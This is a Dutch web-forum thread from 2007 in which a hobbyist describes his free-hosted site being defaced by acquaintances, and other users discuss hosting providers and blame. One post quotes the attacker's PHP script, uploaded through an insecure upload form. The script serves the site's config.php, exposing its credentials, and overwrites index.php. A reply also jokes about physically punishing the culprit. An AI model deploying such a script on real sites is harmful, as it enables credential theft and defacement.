site gehackt.

Overzicht Reageren

Sponsored by: Vacatures door Monsterboard

Traineeship Full Stack Java developer

Dit ga je doen Start jij op 7 augustus bij de Experis Academy dan kickstart jij jouw IT-carrière! We leiden je op tot een gewilde Full Stack Java Developer met alle kennis en vaardigheden die nodig zijn om de arbeidsmarkt te betreden. Wat kun je verwachten, hoe zit een dag in het leven van een Trainee eruit? Periode 1 Als Full Stack Java Developer Trainee volg je vanuit huis een op maat gemaakte onlinetraining die in het Engels wordt gegeven. De tijd die je kwijt bent aan het volgen van de training kun je vergelijken met een fulltime werkweek. In

Bekijk vacature »

App Developer

Samen werken aan een gezonder Nederland en toekomstbestendige zorg voor iedereen. Dat is de impact die jij kan hebben als App Developer bij VGZ. Wil jij een bijdrage leveren aan een maatschappij waarin iedereen zich thuis voelt? Bekijk dan de vacature. Uit onderzoek van Computable is VGZ verkozen tot ‘beste niet-ICT werkgever voor ICT’ers van Nederland’ Hoe ook jij het verschil maakt Als App developer werk jij aan het belangrijkste communicatiekanaal van VGZ, namelijk de App! Als App developer bij VGZ maak je onderdeel uit van een van onze App-teams. Met een goede mix van kennis en ervaring zet je

Bekijk vacature »

No-Code Betty Blocks ontwikkelaar

Bedrijfsomschrijving Wil jij de bedrijfsprocessen van klanten revolutionair digitaliseren en optimaliseren zonder beperkt te worden door programmeertalen? Kom werken bij een snelgroeiende en professionele organisatie met een gezonde dosis humor en veel vrijheid om jezelf te ontwikkelen. Als No-Code Betty Blocks ontwikkelaar werk je vanuit ons kantoor in het hart van Nederland, je thuiswerkplek of op locatie bij de klant. We faciliteren de juiste trainingen en ondersteuning zodat je een echte Betty Blocks expert wordt. Naast het werk zijn er bij ons bijzondere events, zoals een jaarlijkse zeildag, een zomerse barbecue en een knus kerstdiner om de grillige maanden door

Bekijk vacature »

Junior PHP ontwikkelaar

Functie Wij hebben onlangs onze eerste collega’s aangenomen, waardoor ons development team momenteel uit 4 personen bestaat. We bouwen onze software op basis van een PHP-framework (wat op zichzelf een Symfony framework is). Qua ontwikkeling focussen wij ons op 3 focus velden; – API-ontwikkeling/ Component Creatie – Implementatie – Framework ontwikkeling; het toevoegen van nieuwe functionaliteit of interne microservices Onze senior software engineer focust zich momenteel op de laatste twee punten, maar wij komen handen te kort op het eerste veld. Daarom zijn wij op zoek naar een enthousiaste junior software engineer die graag de kneepjes van het vak wil

Bekijk vacature »

C# Ontwikkelaar

Functieomschrijving Voor een software ontwikkelaar in de omgeving van Vught zijn we op zoek naar een gemotiveerde C# ontwikkelaar. Deel jij hun passie voor development en dan vooral in C#.NET? Dan kan dit wel eens jouw droombaan zijn! Jouw werkzaamheden zullen er ongeveer als volgt uit gaan zien Door de wensen van de klant goed te begrijpen ga jij aan de slag dit om te zetten naar passende oplossingen en werk je deze uit tot een sterk eindproduct. Je gaat je bezighouden met de ontwikkeling van webapplicaties en websites, dit doe je door middel van ASP.NET, MVC Frameworks en C#.

Bekijk vacature »

Lead javascript developer Node.js React

Functie Als fullstack JavaScript developer vind jij het uitdagend om op basis van concrete klantvragen nieuwe functionaliteiten te ontwikkelen. Bij voorkeur worden deze functionaliteiten op een bepaalde manier geprogrammeerd, zodat ze door meerdere klanten te gebruiken zijn. Je hebt dus vaak te maken met abstracte vraagstukken. Om dit te kunnen realiseren sta je nauw in contact met de product owner en/of klant. Je bent niet alleen onderdeel van het development team, maar hebt ook vaak contact met de product-owner en/of klanten om daardoor inzichten te verzamelen die leiden tot productverbeteringen. • Inzichten verzamelen bij de klant en/of product owner •

Bekijk vacature »

.NET Developer

Functieomschrijving Ben jij klaar voor de volgende stap in jouw carrière? Kom werken bij dit kleine softwarebureau en werk aan de gaafste maatwerk projecten. Je komt te werken in een klein development team en werk nauw samen met elkaar, om maatwerk software te leveren en bij te dragen aan bedrijfsautomatiseringen. Je gaat werken met de Microsoft stack en technieken als .NET, C#, Entity, MVC, SQL server. In de functie krijg je veel vrijheid om zelf beslissingen te nemen en je hebt impact op de bedrijfsprocessen. Bedrijfsprofiel Dit familiebedrijf bestaat al ruim 20 jaar. Zij hebben een vast netwerk van klanten,

Bekijk vacature »

Java Ontwikkelaar

Java/Kotlin Developer Ben jij een ervaren Java/Kotlin developer met een passie voor het automatiseren van bedrijfsprocessen? Wil je graag deelnemen aan uitdagende projecten bij aansprekende klanten? En ben je op zoek naar een professioneel, ambitieus en dynamisch bedrijf om je carrière verder te ontwikkelen? Kom dan ons team bij Ritense in Amsterdam versterken! Zo ziet de functie eruit: Als Java/Kotlin developer bij Ritense ben je verantwoordelijk voor de ontwikkeling en implementatie van applicaties die bedrijfsprocessen automatiseren, zodat onze klanten slimmer, efficiënter en klantgerichter kunnen werken. Als developer ben je in de lead en zorg je voor de correcte oplevering van

Bekijk vacature »

Back-End Web Developer

As a Back-End Web Developer at Coolblue, you ensure that our webshops work as optimal as possible. How do I become a Back-End Web Developer at Coolblue? As a Back-End Web Developer you work together with other development teams to make our webshop work as optimal as possible and to make our customers happy. Although you are a PHP Developer, you also feel confident with setting up microservices in Typescript or are open to learning this. Would you also like to become a PHP Developer at Coolblue? Read below if the job suits you. You enjoy doing this Writing pure

Bekijk vacature »

Front-end Developer

Dit ga je doen Het onderhouden, ontwikkelen en testen van front-end software van diverse klant- en medewerkersapplicaties; Het ontwikkelen van maatwerk front-end oplossingen in Vue.js en participeren in een scrumteam; Mede-verantwoordelijk voor het begeleiden en coachen van drie junior front-end developers; Verantwoordelijk voor code-reviews en het opstellen van de juiste documentatie zoals userstories en API ontwerp; Participeren in diverse projecten t.b.v. optimalisatie van diverse applicaties; Het opzetten van API koppelingen met externe applicaties. Hier ga je werken Betreffende organisatie is gevestigd in de regio van Swifterbant en is al ruim 20 jaar lang bedreven in het ontwikkelen en aanbieden van

Bekijk vacature »

Team Lead/ Lead developer gezocht (Hands-on, PHP,

Functie Als Team Lead ben je de leider van één van de ontwikkelteams binnen de organisatie. Je leidt als lead developer een goed draaiend team dat werkt aan complexe en duurzame applicaties en API’s. Vanuit je kennis en ervaring ben je in staat het grote plaatje te blijven overzien, en kritisch mee te denken over bijvoorbeeld de architectuur, maar ook de algehele aanpak binnen het project. Je laat je team niet alleen technisch goed functioneren maar ben ook betrokken bij het menselijke aspect. Zo weet jij je collega’s te motiveren en begeleiden in hun dagelijkse werk. Buiten het team ben

Bekijk vacature »

Programmeur / Developer

Voor een familiebedrijf in Doetinchem, actief in de machinebouw voor de food-sector, zijn wij op zoek naar een programmeur / developer. In deze functie ben je werkzaam in een team van 5 medewerkers. Je werkzaamheden bestaan onder andere uit het verhelderen van requirements vanuit de opdrachtgever, de klant en de afdeling ontwikkeling. Je verricht haalbaarheidsstudies en werkt specificaties uit die je afstemt met de opdrachtgever. Je ontwerpt design in software en stemt af met je collega's. De huidige vision-systemen zijn geschreven in C software, welke draait op een CUDA platform. Je schrijft en codeert software en zal gaan testdraaien. Tot

Bekijk vacature »

Java Developer / Sociaal domein

Dit ga je doen Nieuwbouw en doorontwikkeling; Beheer en wanneer nodig onderhoud; Bijdrage leveren in het functioneel- en technisch ontwerptraject; Analyseren van productie verstoringen; Meedenken over vernieuwingen en verbeteringen. Hier ga je werken De organisatie waar jij komt te werken focust zich op software development met een maatschappelijk tintje. De afdeling software ontwikkeling bestaat uit vijf verschillende scrum teams, met allen hun eigen focus gebied. Zo zijn er een aantal teams die zich focussen op specifieke applicaties, maar is er ook een team gericht op projecten. Binnen de organisatie staat innovatie en kwaliteit voorop. Een aantal applicaties draait nog op

Bekijk vacature »

Junior Software Developer

Functie omschrijving Wij zijn op zoek naar een Junior Software Developer!? Sta jij aan het begin van jouw loopbaan of heb jij misschien al enige ervaring? Vind jij het daarnaast belangrijk om jezelf constant te kunnen ontwikkelen en uitdagen? Lees dan snel verder! Voor een vooraanstaand softwarehuis in Nieuwegein ben ik op zoek naar een Junior Software Developer. De eigenaar van het bedrijf is ervan bewust dat je als junior nog een hoop kan leren, waardoor je de eerste maanden veel begeleiding en diverse trainingen krijgt. Daarna ga je samen met je collega's aan zowel kleine als grote projecten werken.

Bekijk vacature »

.NET developer

Functie Als .NET ontwikkelaar ga jij aan de slag bij een van onze klanten actief in de High Tech Industrie. Onze klanten zijn voornamelijk gelokaliseerd in de omgeving van Eindhoven. Wij zijn erg selectief als het gaat om de projecten die wij accepteren en richten ons dan ook alleen op innovatieve en complexe projecten. Omdat onze klanten voornamelijk gespecialiseerd zijn in de machinebouw, werk jij ook vaak dicht tegen de machines aan. Ons team bestaat momenteel uit Embedded engineers, IOT developers en Cloud engineers. Wij werken voornamelijk aan Microsoft projecten waar er gebruik wordt gemaakt van WPF, UWP, .NET Core

Bekijk vacature »

Pagina: 1 2 volgende »

Eric

eric

15/06/2007 18:34:00
Quote Anchor link
Hallo mijn site is ongeveer 1,5 uur geleden gehackt. Ik wilde naar mijn site gaan en opeens stond er dit: (http://eric.byethost8.com). wat moet ik nu doen??

Edit:

Topic gaat niet specifiek over php, daardoor verplaatst naar de koffiehoek.

moderator: Danny Roelofs
Gewijzigd op 01/01/1970 01:00:00 door Eric
 
PHP hulp

PHP hulp

28/04/2024 19:42:11
 
Ponzi

Ponzi

15/06/2007 18:52:00
Quote Anchor link
Eens bellen naar de host? Of het lijkt een gratis accountje. Heeft hij niet gewoon je index.php (.html) vervangen?
 
Jurgen assaasas

Jurgen assaasas

15/06/2007 19:04:00
Quote Anchor link
Zie je wel vaker bij zulk soort hosts. Ik raad je aan een betaalde host te nemen.
 
Aaa Trump

aaa Trump

15/06/2007 19:26:00
Quote Anchor link
whhahahahahahaha Hafohumor!!! xD.

Jah tegen woordig heb je voor 100 euro per jaar al een leuke hosting!
 
Kwastie

Kwastie

15/06/2007 19:28:00
Quote Anchor link
wat dacht je van 25 euro, 3 gb hd, 60 gb traffic. domeinnaam(nee geen reclame, gewoon aanbeveling) www.antagonist.nl, zeer weinig downtime :D mischien alternatief..?
 
Luke Banning

Luke Banning

15/06/2007 20:19:00
Quote Anchor link
robin schreef op 15.06.2007 19:26:
whhahahahahahaha Hafohumor!!! xD.

Jah tegen woordig heb je voor 100 euro per jaar al een leuke hosting!

Ermmmm.... en jij trekt natuurlijk zo 100 euro uit je achterzak?
Je hebt al dingen vanaf 5 euro man, waar een simpele site meer dan voldoende aan heeft
 
Aaa Trump

aaa Trump

15/06/2007 21:06:00
Quote Anchor link
Ik praat over per jaar. :D
 
K i p

K i p

15/06/2007 21:08:00
Quote Anchor link
Luke ook
 
PHP Newbie

PHP Newbie

15/06/2007 21:08:00
Quote Anchor link
robin schreef op 15.06.2007 21:06:
Ik praat over per jaar. :D


Ik betaal nog géén 28 euro per jaar..

8 GB trafic
150 MB webruimte
Uitstekende support
...
 
Menno

menno

15/06/2007 21:11:00
Quote Anchor link
Nou dat is best wel slecht :S
Je kan voor dat geld veel beter krijgen :S
 
Marco PHPJunky

Marco PHPJunky

15/06/2007 21:14:00
Quote Anchor link
ja dat lijkt me wel ja zet anders een eigen server op :P:P
 
Frank -

Frank -

15/06/2007 21:21:00
Quote Anchor link
menno schreef op 15.06.2007 21:11:
Nou dat is best wel slecht :S
Je kan voor dat geld veel beter krijgen :S
Kun je er dan ook even bij vertellen wat jouw definities van goed en slecht zijn?

En bedenk ook, je weet pas of je een goede hostingprovider hebt, als alles goed fout is gegaan. Wanneer hij de boel dan in no-time weer online heeft, dan heb je een goede provider. De meeste knakenboeren geven echter niet thuis wanneer de boel in het 100 loopt...
 
Marco PHPJunky

Marco PHPJunky

15/06/2007 21:24:00
Quote Anchor link
als de host providers hun goede naam wilen behouden of krijgen dan zullen ze eigenlijk wel moeten.... vind ik maarja of ze het doen is ten 2de natuurlijk..
 
Frank -

Frank -

15/06/2007 21:29:00
Quote Anchor link
Marco schreef op 15.06.2007 21:24:
als de host providers hun goede naam wilen behouden of krijgen dan zullen ze eigenlijk wel moeten.... vind ik maarja of ze het doen is ten 2de natuurlijk..
Doen en kunnen, zijn 2 totaal verschillende zaken! Zolang een server draait, heb je geen enkele kennis nodig om de boel online te houden. Stort de boel echter in, dan wordt het een ander verhaal... Bij menig provider ontbreekt de benodigde kennis en kunde om een server goed te beheren. Daarnaast ontbreken noodprocedures of worden deze nooit getest.

Voor een paar euro in de maand kun je niet verwachten dat je een provider met royale service en kunde inhuurt. Bestaat gewoon niet, de kosten liggen namelijk veel hoger. Voor een hobby-site maakt dat echter niet uit, dan is 1 euro per maand een mooi goedkope hobby!

Veel plezier
 
PHP Newbie

PHP Newbie

15/06/2007 23:14:00
Quote Anchor link
PHP Newbie schreef op 15.06.2007 21:08:
robin schreef op 15.06.2007 21:06:
Ik praat over per jaar. :D


Ik betaal nog géén 28 euro per jaar..

- 8 GB trafic
- 150 MB webruimte
- Uitstekende support (Echt uitstekende, problemen over het algemeen dezelfde dag opgelost)
...

- Noodstroomvoorziening
- Je wordt overal van op de hoogte gehouden
- Onderhoud gaat meestal gepaard zonder downtime. Is dit wel gebeurd, wordt dit aan je verteld.
- Support medewerkers met kennis van zaken
- weinig downtime
- Fallback (mail)servers

Voor al dit vind ik zelf dat ik zeker niet teveel betaal...
 
Eric

eric

15/06/2007 23:36:00
Quote Anchor link
ik heb antwoord gekregen van mijn provider. ze hebben mij een log gegeven waar een naam en ip in staat.

Namen zijn, Jurgen en Leon.
Jurgen heeft het volgende script geschreven:

Code (php)
PHP script in nieuw venster Selecteer het PHP script
1
2
3
4
5
6
7
8
9
10
<?header('Content-Type: application/octet-stream');

readfile("../../config.php");

$file = 'index.html';
$newfile = '../../index.php';

if (!copy($file, $newfile)) {
echo "failed to copy $file...\n";
}?>


hierop reageerde mijn provider op: Hi there ,

It appears they used some upload script you had installed , to upload there php script (into /upload/images) , then from there they ultimately had control of your webspace (as they could upload php scripts to it.. )

Log file attached .

Regards
YourSupportGroup.com
A member of the Byethost Internet Group

(ik zet het log er niet op vanwege de privacy)
-----------------------------

Jurgen zei later tegen mij dat hij in mijn config. php keek om ervan te leren dat het beter beveiligd moet worden. Echter heeft hij het config.php inhoud door gestuurd naar Leon. Leon heeft vervolgens ALLE mappen en scripts veranderd, waardoor ik nu echt alles kwijt ben. Leon beweert dat hij nog een backup van de scripts heeft gemaakt, maar die wil hij niet teruggeven.

Als ik het goed begrijp is Leon toch strafbaar bezig en Jurgen toch ook? Nog erger, deze mensen ken ik, ze waren mijn vrienden./
 
- SanThe -

- SanThe -

15/06/2007 23:39:00
Quote Anchor link
PHP Newbie schreef op 15.06.2007 23:14:
- Noodstroomvoorziening Logisch. Zonder dat mag je jezelf niet eens host noemen vind ik.
- Je wordt overal van op de hoogte gehouden Ook logisch lijkt mij.
- Onderhoud gaat meestal gepaard zonder downtime. Is dit wel gebeurd, wordt dit aan je verteld. Dat moeten ze van tevoren melden en niet achteraf.
- Support medewerkers met kennis van zaken Is altijd moeilijk in te schatten. Je komt daar eigenlijk alleen achter als je er zelf veel verstand van hebt.
- weinig downtime Ook logisch.
- Fallback (mail)servers Geven vaak meer problemen dan voordelen.
 
PHP Newbie

PHP Newbie

15/06/2007 23:45:00
Quote Anchor link
SanThe schreef op 15.06.2007 23:39:
PHP Newbie schreef op 15.06.2007 23:14:
- Noodstroomvoorziening Logisch. Zonder dat mag je jezelf niet eens host noemen vind ik.
- Je wordt overal van op de hoogte gehouden Ook logisch lijkt mij.
- Onderhoud gaat meestal gepaard zonder downtime. Is dit wel gebeurd, wordt dit aan je verteld. Dat moeten ze van tevoren melden en niet achteraf.
- Support medewerkers met kennis van zaken Is altijd moeilijk in te schatten. Je komt daar eigenlijk alleen achter als je er zelf veel verstand van hebt.
- weinig downtime Ook logisch.
- Fallback (mail)servers Geven vaak meer problemen dan voordelen.


SanThe, dit valt bij een hoop hosters toch nog altijd vies tegen. En die fallback mailservers werken uitstekend :-)
 
Frank -

Frank -

15/06/2007 23:46:00
Quote Anchor link
Tja, lullig dat het is gebeurd, maar het is ook wel een klein beetje je eigen schuld. Je fiets niet op slot zetten en dan klagen dat die is verdwenen, is net zo iets...

Hopelijk heb je hier iets van geleerd: Het grote boze internet vereist goede beveiliging!

En verder: Je zou eens bij de politie aangifte kunnen doen. Het is alleen afhankelijk van de locale kennis en kunde of ze er ook iets mee gaan doen. Leon vraagt overigens wel om een kleine persoonlijke verbouwing... Maar dat heb ik natuurlijk niet gezegd, dan ben jij namelijk net zo strafbaar!

Ps. Ga lekker verder klooien met PHP, maar zet geen belangrijke data op jouw server wanneer je niet zeker weet of je de beveiliging goed op orde hebt. En van je fouten leer je, vergeet dat vooral niet.
 
Eric

eric

15/06/2007 23:49:00
Quote Anchor link
is het dan verbeterd dat ik mijn config.php voortaan bijvoorbeeld verander in configlalajekomtertochnietachter.php ??:P
 
Jurgen

Jurgen

16/06/2007 00:02:00
Quote Anchor link
Ik heb Eric belooft hem te gaan helpen met het beveiligen van alles, ik wil even kwijt dat ik Eric alleen maar even wou laten zien hoe simpel het is om zijn uploadscript te misbruiken. Helaas is het uit de hand gelopen en dat vind ik jammer. Ik ken Eric al 2 jaar en ik heb echt nooit iets lulligs willen doen tegen em. Wat Leon betreft is hij echt bij mij over de lijn gegaan. Leon is van het type 'ik weet niet wanneer ik moet ophouden' en straks ben ik de sjaak omdat hij nu erics bestanden heeft die hij niet wil teruggeven.

Jurgen
 

Pagina: 1 2 volgende »



Overzicht Reageren

 
 

Om de gebruiksvriendelijkheid van onze website en diensten te optimaliseren maken wij gebruik van cookies. Deze cookies gebruiken wij voor functionaliteiten, analytische gegevens en marketing doeleinden. U vindt meer informatie in onze privacy statement.